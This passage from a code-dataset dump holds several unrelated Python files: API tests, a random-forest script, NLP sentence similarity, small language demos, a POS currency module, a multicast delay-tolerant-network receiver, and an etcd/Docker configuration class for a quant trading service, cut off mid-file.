res['data']['subtitle_group'][:1]\r\n elif len(res['data']['subtitle_group']) == 1:\r\n subtitle_group = res['data']['subtitle_group'][:0]\r\n else:\r\n subtitle_group = []\r\n subtitle = ','.join(subtitle_group)\r\n\r\n r = self.fetch('/api/filter', method='POST', body=json.dumps({\r\n 'name': self.bangumi_1,\r\n 'include': include,\r\n 'regex': regex,\r\n 'exclude': exclude,\r\n 'subtitle': subtitle,\r\n }), headers=self.headers)\r\n\r\n r = self.fetch('/api/filter', method='POST', body=json.dumps({\r\n 'name': self.bangumi_1,\r\n }), headers=self.headers)\r\n\r\n res = self.parse_response(r)\r\n\r\n self.assertEqual(r.code, 200)\r\n self.assertEqual(res['status'], 'success')\r\n self.assertEqual(res['data']['name'], self.bangumi_1)\r\n self.assertEqual(res['data']['include'], include)\r\n self.assertEqual(res['data']['regex'], regex)\r\n self.assertEqual(res['data']['exclude'], exclude)\r\n\r\n r = self.fetch('/api/filter', method='POST', body=json.dumps({\r\n 'name': self.bangumi_3,\r\n 'regex': '.*',\r\n 'subtitle': '',\r\n }), headers=self.headers)\r\n self.assertEqual(r.code, 400)\r\n self.assertEqual(self.parse_response(r)['status'], 'error')\r\n for item in subtitle_group:\r\n self.assertIn(item, res['data']['followed'])\r\n for item in res['data']['followed']:\r\n self.assertIn(item, subtitle_group)\r\n\r\n def test_resource_ics(self):\r\n r = self.fetch('/resource/feed.xml')\r\n self.assertEqual(r.code, 200)\r\n\r\n def test_resource_feed(self):\r\n r = self.fetch('/resource/calendar.ics')\r\n self.assertEqual(r.code, 200)\r\n\r\n def test_no_auth(self):\r\n r = self.fetch('/api/add', method='POST', body=json.dumps({'name': self.bangumi_1}))\r\n self.assertEqual(r.code, 401)\r\n\r\n @staticmethod\r\n def parse_response(response):\r\n r = json.loads(response.body.decode('utf-8'))\r\n return r\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","sub_path":"tests/test_http_api.py","file_name":"test_http_api.py","file_ext":"py","file_size_in_byte":7353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"552276559","text":"import pandas as pd\nconc=pd.read_excel('Concrete_Data.xls')\nconc.to_csv('test.csv')\nwith open(\"test.csv\",'r') as f, open(\"newtest.csv\",'w') as f1:\n next(f) \n for line in f:\n f1.write(line)\nconc=pd.read_csv('newtest.csv')\nconc.columns=['num','cement','blast','ash','water','sp','cagg','fagg','age','strength']\nfrom sklearn.model_selection import train_test_split\ny=conc['strength']\nX=conc.drop(['strength','num'],axis=1)\nX_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.2,random_state=54,shuffle=True)\nfrom sklearn.ensemble import RandomForestRegressor\nclf=RandomForestRegressor(n_estimators=382, max_depth=None,min_samples_split=2,random_state=8)\nclf.fit(X_train,y_train)\ny_pred=clf.predict(X_test)\nprint(clf.score(X_test,y_test))\ndic=dict(zip(X.columns,clf.feature_importances_))\nfor item in sorted(dic.items(), key=lambda x: x[1], reverse=True):\n print(item[0],round(item[1],4))\ntree=clf.estimators_[5]\nfrom sklearn.tree import export_graphviz\n# Export as dot file\nimport pydotplus\nimport StringIO\ndotfile=StringIO.StringIO()\nexport_graphviz(tree, out_file=dotfile) \ngraph=pydotplus.graph_from_dot_data(dotfile.getvalue())\ngraph.write_png(\"tree.png\")\nfrom PIL import Image\nimage=Image.open('tree.png')\nimage.show()\n","sub_path":"concrete_rf32.py","file_name":"concrete_rf32.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"628760292","text":"#句式复杂度,句子结构相似度\nimport numpy as np\nfrom stanfordcorenlp import StanfordCoreNLP\n#导入模型,耗时较长\nnlp = StanfordCoreNLP('stanford-corenlp-full-2016-10-31')\n\n#基于依存分析判断句式相似度,返回相似度百分比0-1\ndef sentenceSim(sentence1,sentence2):\n depecy1 = nlp.dependency_parse(sentence1)\n print(depecy1)\n depecy1 = np.array(depecy1)[:, 0]\n depecy2 = nlp.dependency_parse(sentence2)\n print(depecy2)\n depecy2 = np.array(depecy2)[:, 0]\n union = set(depecy1) & set(depecy2)\n union = [i for i in list(union) if i not in ['ROOT','punc','punct']]\n depecy1 = [i for i in list(depecy1) if i not in ['ROOT','punc','punct']]\n print(union)\n print(\"dependency result(similar)\")\n result = float(len(union)) / max(len(depecy1),len(depecy2))\n print(\"====================\")\n return result\n\n#基于句法分析树判断句式结构复杂度,返回复杂度百分比0-1\ndef sentenceComplex(sentence1,sentence2):\n# print(\"Constituency result(complex)\")\n tree1 = nlp.parse(sentence1)\n tree2 = nlp.parse(sentence2)\n# print(tree1)\n# print(tree2)\n tree1 = tree1.split('\\n ')\n tree2 = tree2.split(\"\\n \")\n result1 = 0\n for theight in tree1:\n tcount1 = 0\n for tmp in theight:\n if (tmp == '('):\n tcount1 += 1\n result1 = max(result1,tcount1)\n result2 = 0\n for theight in tree2:\n tcount2 = 0\n for tmp in theight:\n if (tmp == '('):\n tcount2 += 1\n result2 = max(result2,tcount2)\n# print(float(result2))\n# ans =abs(result2-result1)/min(result1,result2)\n ans = result2 / result1\n if ans > 1:\n return 1\n else:\n return ans\n#用于测试\nif __name__ == '__main__':\n sentence1 = \"what do you mean\"\n sentence2 = \"what are you talking about\"\n print(sentenceSim(sentence1,sentence2))\n print(sentenceComplex(sentence1,sentence2))\n\n\n\n\n\n","sub_path":"model/complexity/model0.py","file_name":"model0.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"254290727","text":"# -*- coding: utf-8 -*-\n\"\"\"\nauthor: 苏亚涛\nemail: yataosu@gmail.com\ncreate_time: 2019/10/24 13:58\nfile: runtimeerror_demo.py\nide: PyCharm\n\"\"\"\n\n\ndef demo():\n raise RuntimeError(\"test\")\n\n\nrv = \"192.168.0.111:8000\"\nrv = rv.rsplit(':', 1)[0].lstrip('.')\nprint(rv)\n","sub_path":"coding/learn_python/runtimeerror_demo.py","file_name":"runtimeerror_demo.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"197631880","text":"import pos\r\nfrom pos.modules import Module\r\n\r\nclass ModuleLoader(Module):\r\n dependencies = ('base',)\r\n config = [['mod.currency', {'default': ''}]]\r\n name = 'Multiple Currencies Support'\r\n\r\n def load(self):\r\n from pos.modules.currency.objects.currency import Currency\r\n from pos.modules.currency.objects.currencyunit import CurrencyUnit\r\n return [Currency, CurrencyUnit]\r\n\r\n def test(self):\r\n from pos.modules.currency.objects.currency import Currency\r\n from pos.modules.currency.objects.currencyunit import CurrencyUnit\r\n \r\n LL = Currency(name='Lebanese Lira', symbol='L.L.', value=1.0, decimal_places=0, digit_grouping=True)\r\n USD = Currency(name='U.S. Dollar', symbol='USD', value=1500, decimal_places=2, digit_grouping=True)\r\n EUR = Currency(name='Euro', symbol='EUR', value=2000, decimal_places=2, digit_grouping=True)\r\n \r\n ll_values = [250, 500, 1000, 5000, 10000, 20000, 50000, 100000]\r\n usd_values = [0.01, 0.02, 0.05, 0.10, 0.20, 0.50, 1, 2, 5, 10, 20, 50, 100]\r\n eur_values = [0.01, 0.02, 0.05, 0.10, 0.20, 0.50, 1, 2, 5, 20, 20, 50, 100, 500]\r\n \r\n [CurrencyUnit(value=v, currency=LL) for v in ll_values]\r\n [CurrencyUnit(value=v, currency=USD) for v in usd_values]\r\n [CurrencyUnit(value=v, currency=EUR) for v in eur_values]\r\n \r\n session = pos.database.session()\r\n session.add(LL)\r\n session.add(USD)\r\n session.add(EUR)\r\n session.commit()\r\n\r\n def menu(self):\r\n from pos.modules.currency.panels import CurrenciesPanel\r\n \r\n return [[],\r\n [{'parent': 'System', 'label': 'Currencies', 'page': CurrenciesPanel}]]\r\n\r\n def init(self):\r\n import wx\r\n from pos.modules.currency.dialogs import CurrencyDialog\r\n from pos.modules.currency.objects.currency import Currency\r\n \r\n session = pos.database.session()\r\n currency_count = session.query(Currency).count()\r\n if currency_count == 0:\r\n dlg = CurrencyDialog(None)\r\n result = dlg.ShowModal()\r\n if result == wx.ID_OK:\r\n c = Currency(**dlg.data)\r\n session.add(c)\r\n session.commit()\r\n return c\r\n else:\r\n return False\r\n \r\n def config_panels(self):\r\n from pos.modules.currency.panels import CurrencyConfigPanel \r\n return [CurrencyConfigPanel]\r\n","sub_path":"pos/modules/currency/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"240934792","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n枚举类\n\n\"\"\"\nfrom enum import Enum,unique;\n\nMonth = Enum(\"Month\", ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'));\n\n# @unique装饰器可以帮助我们检查保证没有重复值\n@unique\nclass Weekday(Enum):\n Sun = 0 # Sun的value被设定为0\n Mon = 1\n Tue = 2\n Wed = 3\n Thu = 4\n Fri = 5\n Sat = 6\n\nif __name__ == '__main__':\n\n for name,member in Month.__members__.items():\n print(\"name: %s ; menber: %s\"%(name,member));\n\n # 访问这些枚举类型\n oday = Weekday.Fri;\n print(oday);\n print(Weekday.Mon);\n print(Weekday[\"Mon\"]);\n print(Weekday.Mon.value);\n pass;","sub_path":"PycharmProjects/DataAnalysis/study/o_enum.py","file_name":"o_enum.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"458403360","text":"import decimal\nimport datetime\n\n\ndef exasol_mapper(val, data_type):\n \"\"\"\n Convert into Python 3 data types according to Exasol manual\n\n strptime() function is slow, so we use direct string slicing for performance sake\n More details about this problem: http://ze.phyr.us/faster-strptime/\n\n DECIMAL(p,0) -> int\n DECIMAL(p,s) -> decimal.Decimal\n DOUBLE -> float\n DATE -> datetime.date\n TIMESTAMP -> datetime.datetime\n BOOLEAN -> bool\n VARCHAR -> str\n CHAR -> str\n -> str\n \"\"\"\n\n if val is None:\n return None\n elif data_type['type'] == 'DECIMAL':\n if data_type['scale'] == 0:\n return int(val)\n else:\n return decimal.Decimal(val)\n elif data_type['type'] == 'DATE':\n return datetime.date(int(val[0:4]), int(val[5:7]), int(val[8:10]))\n elif data_type['type'] == 'TIMESTAMP':\n return datetime.datetime(int(val[0:4]), int(val[5:7]), int(val[8:10]), # year, month, day\n int(val[11:13]), int(val[14:16]), int(val[17:19]), # hour, minute, second\n int(val[20:26].ljust(6, '0')) if len(val) > 20 else 0) # microseconds (if available)\n else:\n return val\n","sub_path":"pyexasol/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"195050652","text":"def number(n):\n dp = [[0] * 10 for i in range(n)]\n dp[0][0] = 0\n for i in range(1, 10):\n dp[0][i] = 1\n for i in range(1, n):\n dp[i][0] = dp[i - 1][0] + dp[i - 1][1]\n for j in range(1, 9):\n dp[i][j] = dp[i - 1][j - 1] + dp[i - 1][j] + dp[i - 1][j + 1]\n dp[i][9] = dp[i - 1][8] + dp[i - 1][9]\n return sum(dp[n - 1])\n\n\nnumbers_in = open('numbers.in', 'r')\nnumbers_out = open('numbers.out', 'w')\n\nn = int(numbers_in.readline())\nnumbers_in.close()\n\nprint(number(n), file=numbers_out)\nnumbers_in.close()\n","sub_path":"lKSH/day10/numbers.py","file_name":"numbers.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"179164803","text":"# Exceptions (exceptions are for user errors)\n# --------------------------------------------------------\ndef boxPrint(symbol, width, height):\n # Raising different exceptions to stop the program in case the paremeters are wrong\n if len(symbol) != 1:\n raise Exception('Symbol must be a single character string.')\n if width <= 2:\n raise Exception('Width must be greater than 2.')\n if height <= 2:\n raise Exception('Height must be greater than 2.')\n print(symbol * width)\n for i in range(height - 2):\n print(symbol + (' ' * (width - 2)) + symbol)\n print(symbol * width)\n\nboxPrint('*', 5, 5)\n\n# Assertions (assertions are for programmer errors)\n# --------------------------------------------------------\nmarket_2nd = {'ns': 'green', 'ew': 'yellow'}\n\ndef switchLights(intersection):\n for key in intersection.keys():\n if intersection[key] == 'green':\n intersection[key] = 'yellow'\n elif intersection[key] == 'yellow':\n intersection[key] = 'red'\n elif intersection[key] == 'red':\n intersection[key] = 'green'\n # Always has to exist one light that is red in one direction\n assert 'red' in intersection.values(), 'Neither light is red' # if the assert fails the program crash\n\nprint(market_2nd)\nswitchLights(market_2nd)\nprint(market_2nd)\n\n# Priniting a Traceback\n# --------------------------------------------------------\nimport traceback\ntry:\n raise Exception('This is the error message')\nexcept: # we can write the traceback in a file\n error_File = open('error_log.txt', 'a')\n error_File.write(traceback.format_exc())\n error_File.close()\n print('The traceback info was written in error_log.txt')\n\n# Logging\n# --------------------------------------------------------\nimport logging\n\nlogging.basicConfig(filename = 'program_log.txt', level=logging.DEBUG, format=' %(asctime)s - %(levelname)s - %(message)s')\nlogging.disable(logging.CRITICAL) # disables all logging messages\n\nlogging.debug('Start of program')\n\ndef factorial(n):\n logging.debug('Start of factorial(%s)' % (n))\n total = 1\n for i in range(1,n + 1):\n total *= i\n logging.debug('i is ' + str(i) + ', total is ' + str(total))\n logging.debug('End of factorial(%s)' % (n))\n return total\n\nprint(factorial(5))\nlogging.debug('End of program')","sub_path":"12_debugging.py","file_name":"12_debugging.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"49893882","text":"# -*- coding: utf-8 -*-\nimport socket\nimport struct\nimport sys\nimport pickle\nimport json\nimport ast\nimport time\nimport os\nfrom geopy.distance import geodesic\n\nfrom pip._vendor.distlib.compat import raw_input\n\nlat_to = -7.265441\nlong_to = 112.797661\n\n\nport = 12346\nnodeid='s1'\npesanDikirim = []\n\ndef getDistance(lat_from,long_from):\n coords_1 = (lat_from, long_from)\n coords_2 = (lat_to, long_to)\n return geodesic(coords_1, coords_2).km\n\ndef compareDistance(distance,distance_limit):\n if distance data[7]):\n print('Hop count: ' + str(hop))\n print('Hop count limit reached')\n break\n elif (data[1] == nodeid):\n print('Message : ' + pesan)\n print('Last DTN node in the route')\n print('Time elapsed: ' + str(data[4]))\n print('Hop count: ' + str(hop))\n sock.sendto(b'ack', address)\n break\n send = sendMsg(pesan, destination, hop, data[3], data[4], data[5], data[6], data[7], data[8], data[9])\n if send == 1:\n break\n\ndef sendMsg(message,dest,hop,timestamp, source, lat_from,long_from,hop_limit,time_limit, distance_limit):\n settime = timestamp\n timecek = 0\n pesanDikirim = [message, dest, hop, time.time(), source, lat_from, long_from, hop_limit, time_limit,distance_limit]\n print('Sending message to nodeid ' + str(dest))\n hasil = send(pesanDikirim, port)\n while (timecek < time_limit):\n if hasil == 0:\n hasil = send(pesanDikirim, port)\n else:\n print('Message sent to nodeid ' + str(dest))\n break\n timecek = time.time() - settime\n if hasil == 0:\n print('Message lifetime limit reached, message will be deleted\\n')\n return 1\n\ndef send(message,port):\n multicast_group = ('224.3.29.71', port)\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.settimeout(0.2)\n ttl = struct.pack('b', 1)\n sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, ttl)\n sock.sendto(json.dumps(message).encode('utf8'), multicast_group)\n while True:\n try:\n sock.recvfrom(16)\n except:\n sock.close()\n return 0\n else:\n print ('Message has been sent')\n sock.close()\n return 1\n\nif __name__ == '__main__':\n print(\"[Node ID \" + str(nodeid) + \"]\")\n print(\"--------------------\")\n print(\"1. Receive and deliver message to next node\")\n print(\"2. Exit\")\n while 1:\n print(\"\\nYour choice?\")\n pilihan = raw_input('>> ')\n if (pilihan == '1'):\n multicast()\n elif (pilihan == '2'):\n exit()","sub_path":"Delay Tolerant Network/receiver1/receive.py","file_name":"receive.py","file_ext":"py","file_size_in_byte":3762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"177178656","text":"import sys\nimport time\nimport json\n\nimport etcd\n\nfrom docker.types import RestartPolicy\nfrom docker.types.services import RestartConditionTypesEnum\n\n\nclass EtcdConfigMixin(object):\n\n BACKTEST = \"backtest\"\n REALTRADE = \"realtrade\"\n SIMULATION = \"simulation\"\n CBACKTEST = \"cbacktest\"\n\n # configs\n INDEX_SERVER_URIS = \"139.159.135.96:9802\"\n JZDATAURI = \"192.168.100.78:27017\"\n STRATEGY_MONGO = ''\n INDEX_SWITCH_SERVER = False\n\n # envs\n DOCKER_QUANT_IMAGE = 'cdh1:5000/jzquant:latest'\n DOCKER_V_BIND = '/data/strategy_data'\n DOCKER_NETWORK = ''\n STRATEGY_SENTRY_DSN = \"https://key1:key2@sentry.jingzhuan.cn/x\"\n MQ_HOST = \"127.0.0.1\"\n MQ_PORT = 5672\n STRATEGY_WRITE_EX = \"strategy\"\n STRATEGY_READ_EX = \"task_cmd\"\n MQ_VHOST = \"quant\"\n MQ_USERNAME = \"guest\"\n MQ_PASSWORD = \"guest\"\n\n QUANTUSER_SERVER_URL = \"http://139.159.148.58/u\"\n QUANTUSER_APP_ID = \"back\"\n QUANTUSER_TOKEN = ''\n QUANTUSER_REDIS_URI = ''\n DOCKER_QUANT_TRADE_IMAGE = ''\n TRADE_HOST = \"ff46fd5a21bf4fc4b3777e3ab4a96273\"\n TRADE_PORT = 9980\n MYSQL_URI = \"mysql+cymysql://root:ruiyang@127.0.0.1/trading?charset=utf8\"\n\n FUTURE_QUOTE_HOST = \"127.0.0.1\"\n FUTURE_QUOTE_PORT = 24444\n FUTURE_TRADE_HOST = \"127.0.0.1\"\n FUTURE_TRADE_PORT = 9980\n\n MOUNTS = [\"/etc/localtime:/etc/localtime:ro\"]\n\n log_driver = 'json-file'\n log_driver_options = {\"max-size\": \"10m\"}\n restart_policy = RestartPolicy(RestartConditionTypesEnum.NONE)\n source_code = \"\"\"\ndef init(context):\n logger.info('向导式策略启动')\ndef handle_bar(context, bar_dict):\n pass\n \"\"\"\n\n backtest_dir = \"/service/config/backtest/\"\n simulation_dir = \"/service/config/simulation/\"\n realtrade_dir = \"/service/config/realtrade/\"\n backtest_environment_dir = \"/service/environment/backtest/\"\n simulation_environment_dir = \"/service/environment/simulation/\"\n realtrade_environment_dir = \"/service/environment/realtrade/\"\n\n\n @property\n def etcd(self):\n return etcd.Client(host='127.0.0.1', port=2379)\n\n def set_realtrade_args(self):\n realtrade = dict()\n\n config_atr = ('run_type', 'mod_config'\n 'start_date', 'end_date', 'stock_starting_cash', 'frequency', 'benchmark',\n 'user_id', 'user_account', 'strategy_id', 'strategy_name', 'code_type',\n 'index_server_uris', 'index_switch_server',\n 'source_code',\n 'log_level', 'task_id'\n )\n\n mod_atr = ('messaging__enabled', 'mongodb__enabled', 'exception__enabled', 'mongodb__mongouri',\n 'guide_buy_sell__enabled', 'guide_buy_sell__kwarg',\n 'guide_stockpool__enabled', 'guide_stockpool__kwarg', 'realtime__fps',\n\n 'sys_simulation__enabled', 'sys_progress__enabled', 'sys_analyser__enabled',\n 'messaging__rw', 'realtrade__enabled', 'sys_risk__enabled', 'mongodb__enabled',\n 'mongodb__mongouri', 'terminator__enabled')\n\n for atr in config_atr:\n realtrade.update({atr: \"\"})\n\n mod_config = dict()\n for atr in mod_atr:\n mod_config.update({atr: ''})\n\n mod_config.update({'messaging__enabled': \"true\"})\n\n mod_config.update({'guide_buy_sell__enabled': 'true'})\n mod_config.update({'guide_stockpool__enabled': 'true'})\n\n mod_config.update({'realtime__fps': 'true'})\n\n mod_config.update({'sys_simulation__enabled': 'false'})\n mod_config.update({'sys_progress__enabled': 'false'})\n mod_config.update({'sys_analyser__enabled': 'false'})\n mod_config.update({'messaging__rw': '3'})\n mod_config.update({'realtrade__enabled': 'true'})\n mod_config.update({'sys_risk__enabled': 'true'})\n mod_config.update({'mongodb__enabled': 'true'})\n mod_config.update({'mongodb__mongouri': self.JZDATAURI})\n mod_config.update({'terminator__enabled': 'true'})\n\n realtrade.update({'run_type': \"r\"})\n realtrade.update({'source_code': self.source_code})\n realtrade.update({'index_server_uris': self.INDEX_SERVER_URIS})\n realtrade.update({'index_switch_server': self.INDEX_SWITCH_SERVER})\n realtrade.update({'log_level': \"verbose\"})\n\n realtrade.update({'mod_config': mod_config})\n\n self.etcd.set(self.realtrade_dir, json.dumps(realtrade))\n\n def set_simulation_args(self):\n simulation = dict()\n config_atr = ('run_type', 'mod_config'\n 'start_date', 'end_date', 'stock_starting_cash', 'frequency', 'benchmark',\n 'user_id', 'user_account', 'strategy_id', 'strategy_name', 'code_type',\n 'index_server_uris', 'index_switch_server',\n 'source_code',\n 'log_level', 'task_id'\n\n )\n\n mod_atr = ('messaging__enabled', 'mongodb__enabled', 'exception__enabled', 'mongodb__mongouri',\n 'guide_buy_sell__enabled', 'guide_buy_sell__kwarg',\n 'guide_stockpool__enabled', 'guide_stockpool__kwarg', 'realtime__fps',\n\n 'sys_simulation__matching_type', 'sys_simulation__slippage',\n 'sys_simulation__commission_multiplier',\n 'realtime__enabled', 'realtime__simulation_id', 'messaging__rw')\n\n for atr in config_atr:\n simulation.update({atr: ''})\n\n mod_config = dict()\n for atr in mod_atr:\n mod_config.update({atr: ''})\n\n mod_config.update({'messaging__enabled': \"true\"})\n mod_config.update({'mongodb__enabled': \"true\"})\n mod_config.update({'exception__enabled': \"true\"})\n mod_config.update({'mongodb__mongouri': self.JZDATAURI})\n mod_config.update({'guide_buy_sell__enabled': 'true'})\n mod_config.update({'guide_stockpool__enabled': 'true'})\n mod_config.update({'realtime__enabled': 'true'})\n mod_config.update({'messaging__rw': \"3\"})\n\n simulation.update({'mod_config': mod_config})\n\n simulation.update({'run_type': \"p\"})\n simulation.update({'source_code': self.source_code})\n simulation.update({'index_server_uris': self.INDEX_SERVER_URIS})\n simulation.update({'index_switch_server': self.INDEX_SWITCH_SERVER})\n simulation.update({'log_level': \"verbose\"})\n\n self.etcd.set(self.simulation_dir, json.dumps(simulation))\n\n def set_backtest_args(self):\n backtest = dict()\n config_atr = ('run_type', 'mod_config',\n 'start_date', 'end_date', 'stock_starting_cash', 'frequency', 'benchmark',\n 'user_id', 'user_account', 'strategy_id', 'strategy_name', 'code_type',\n 'log_level', 'task_id', 'run_type',\n # 'index_server', 'index_port',\n 'index_server_uris', 'index_switch_server',\n 'source_code',\n 'log_level', 'task_id',)\n\n mod_atr = ('messaging__enabled', 'mongodb__enabled', 'exception__enabled','mongodb__mongouri',\n 'guide_buy_sell__enabled', 'guide_buy_sell__kwarg',\n 'guide_stockpool__enabled', 'guide_stockpool__kwarg',\n\n 'sys_simulation__matching_type', 'sys_simulation__slippage',\n 'sys_simulation__commission_multiplier', 'sys_simulation__stock_min_commision',\n 'trade_message__enabled', 'trade_message__debug', 'storeDB__enabled',\n 'storeDB__host', 'messaging__rw')\n\n for atr in config_atr:\n backtest.update({atr: ''})\n\n mod_config = dict()\n for atr in mod_atr:\n mod_config.update({atr: ''})\n\n mod_config.update({'messaging__enabled': \"true\"})\n mod_config.update({'mongodb__enabled': \"true\"})\n mod_config.update({'exception__enabled': \"true\"})\n mod_config.update({'mongodb__mongouri': self.JZDATAURI})\n mod_config.update({'guide_buy_sell__enabled': 'true'})\n mod_config.update({'guide_stockpool__enabled': 'true'})\n mod_config.update({'trade_message__enabled': 'true'})\n mod_config.update({'trade_message__debug': 'true'})\n mod_config.update({'storeDB__enabled': 'true'})\n mod_config.update({'storeDB__host': self.STRATEGY_MONGO})\n mod_config.update({'messaging__rw': \"1\"})\n\n backtest.update({'mod_config': mod_config})\n backtest.update({'run_type': \"b\"})\n backtest.update({'source_code': self.source_code})\n backtest.update({'index_server_uris': self.INDEX_SERVER_URIS})\n backtest.update({'index_switch_server': self.INDEX_SWITCH_SERVER})\n\n self.etcd.set(self.backtest_dir, json.dumps(backtest))\n\n def set_backtest_environment(self):\n environment = dict()\n\n image = self.DOCKER_QUANT_IMAGE\n\n labels = {'type': self.BACKTEST, \"user\": \"\"}\n\n mounts = self.MOUNTS\n\n # volume = self.DOCKER_V_BIND\n\n jzdatarui = self.JZDATAURI\n strategy_sentry = self.STRATEGY_SENTRY_DSN\n mqhost = self.MQ_HOST\n mqport = self.MQ_PORT\n write_ex = self.STRATEGY_WRITE_EX\n read_ex = self.STRATEGY_READ_EX\n mq_vhost = self.MQ_VHOST\n mq_username = self.MQ_USERNAME\n mq_password = self.MQ_PASSWORD\n\n envs = [\n \"JZDATAURI={}\".format(jzdatarui),\n f\"SENTRY_DSN={strategy_sentry}\",\n f\"MQ_HOST={mqhost}\",\n f\"MQ_PORT={mqport}\",\n f\"STRATEGY_WRITE_EX={write_ex}\",\n f\"STRATEGY_READ_EX={read_ex}\",\n f\"MQ_VHOST={mq_vhost}\",\n f\"MQ_USERNAME={mq_username}\",\n f\"MQ_PASSWORD={mq_password}\",\n ]\n\n log_driver = self.log_driver\n\n log_driver_options = self.log_driver_options\n\n restart_policy = self.restart_policy\n\n networks = self.DOCKER_NETWORK\n networks = networks.split(',')\n\n environment.update({\n \"image\": image,\n \"labels\": labels,\n \"mounts\": mounts,\n \"envs\": envs,\n \"log_driver\": log_driver,\n \"log_driver_options\": log_driver_options,\n \"restart_policy\": restart_policy,\n \"networks\": networks\n })\n\n self.etcd.set(self.backtest_environment_dir, json.dumps(environment))\n\n def set_simulation_environment(self):\n environment = self.backtest_environment\n labels = environment.get(\"labels\")\n labels.update({'type': self.SIMULATION})\n environment.update({\"labels\": labels})\n self.etcd.set(self.simulation_environment_dir, json.dumps(environment))\n\n def set_realtrade_environmet(self):\n environment = dict()\n\n # volume = self.DOCKER_V_BIND\n image = self.DOCKER_QUANT_TRADE_IMAGE\n\n labels={'type': self.REALTRADE, \"user\": ''}\n\n mounts = self.MOUNTS\n\n jzdatarui = self.JZDATAURI\n mysql_uri = self.MYSQL_URI\n quantuser_url = self.QUANTUSER_SERVER_URL\n quantuser_app_id = self.QUANTUSER_APP_ID\n quantuser_token = self.QUANTUSER_TOKEN\n quantuser_redis_uri = self.QUANTUSER_REDIS_URI\n trade_host = self.TRADE_HOST\n trade_port = self.TRADE_PORT\n strategy_sentry = self.STRATEGY_SENTRY_DSN\n mqhost = self.MQ_HOST\n mqport = self.MQ_PORT\n write_ex = self.STRATEGY_WRITE_EX\n read_ex = self.STRATEGY_READ_EX\n mq_vhost = self.MQ_VHOST\n mq_username = self.MQ_USERNAME\n mq_password = self.MQ_PASSWORD\n future_quote_host = self.FUTURE_QUOTE_HOST\n future_quote_port = self.FUTURE_QUOTE_PORT\n future_trade_host = self.FUTURE_TRADE_HOST\n future_trade_port = self.FUTURE_TRADE_PORT\n\n envs = [\n \"JZDATAURI={}\".format(jzdatarui),\n 'MYSQL_URI={}'.format(mysql_uri),\n \"QUANTUSER_URL={}\".format(quantuser_url),\n \"QUANTUSER_APP_ID={}\".format(quantuser_app_id),\n \"QUANTUSER_TOKEN={}\".format(quantuser_token),\n \"QUANTUSER_REDIS_URI={}\".format(quantuser_redis_uri),\n \"TRADE_HOST={}\".format(trade_host),\n \"TRADE_PORT={}\".format(trade_port),\n f\"SENTRY_DSN={strategy_sentry}\",\n f\"MQ_HOST={mqhost}\",\n f\"MQ_PORT={mqport}\",\n f\"STRATEGY_WRITE_EX={write_ex}\",\n f\"STRATEGY_READ_EX={read_ex}\",\n f\"MQ_VHOST={mq_vhost}\",\n f\"MQ_USERNAME={mq_username}\",\n f\"MQ_PASSWORD={mq_password}\",\n f\"FUTURE_QUOTE_HOST={future_quote_host}\",\n f\"FUTURE_QUOTE_PORT={future_quote_port}\",\n f\"FUTURE_TRADE_HOST={future_trade_host}\",\n f\"FUTURE_TRADE_PORT={future_trade_port}\",\n ]\n\n log_driver = self.log_driver\n\n log_driver_options = self.log_driver_options\n\n networks = self.DOCKER_NETWORK\n networks = networks.split(',')\n\n environment.update({\n \"image\": image,\n \"labels\": labels,\n \"mounts\": mounts,\n \"envs\": envs,\n \"log_driver\": log_driver,\n \"log_driver_options\": log_driver_options,\n \"networks\": networks\n })\n\n self.etcd.set(self.realtrade_environment_dir, json.dumps(environment))\n\n @property\n def simulation_args(self):\n return json.loads(self.etcd.read(self.simulation_dir).value)\n\n @property\n def backtest_args(self):\n return json.loads(self.etcd.read(self.backtest_dir).value)\n\n @property\n def realtrade_args(self):\n return json.loads(self.etcd.read(self.realtrade_dir).value)\n\n @property\n def backtest_environment(self):\n return json.loads(self.etcd.read(self.backtest_environment_dir).value)\n\n @property\n def simulation_environment(self):\n return json.loads(self.etcd.read(self.simulation_environment_dir).value)\n\n @property\n def realtrade_environment(self):\n return json.loads(self.etcd.read(self.realtrade_environment_dir).value)\n\n\nclass BaseConfigMixin(EtcdConfigMixin):\n def base_update(self):\n pass\n\n def realtrade_commond(self):\n configs = self.realtrade_args\n mod_config = configs.get(\"mod_config\", {})\n\n configs.update({\n \"start_date\": self.start_date,\n \"end_date\": self.end_date,\n \"stock_starting_cash\": self.stock_starting_cash,\n \"frequency\": self.frequency,\n \"benchmark\": self.benchmark,\n \"user_id\": self.user_id,\n \"user_account\": self.user_account,\n \"strategy_id\": self.id,\n \"strategy_name\": self.name,\n \"code_type\": self.type,\n\n \"task_id\": self.id,\n\n })\n\n uris = configs.get(\"index_server_uris\").split(\",\")\n server_list = 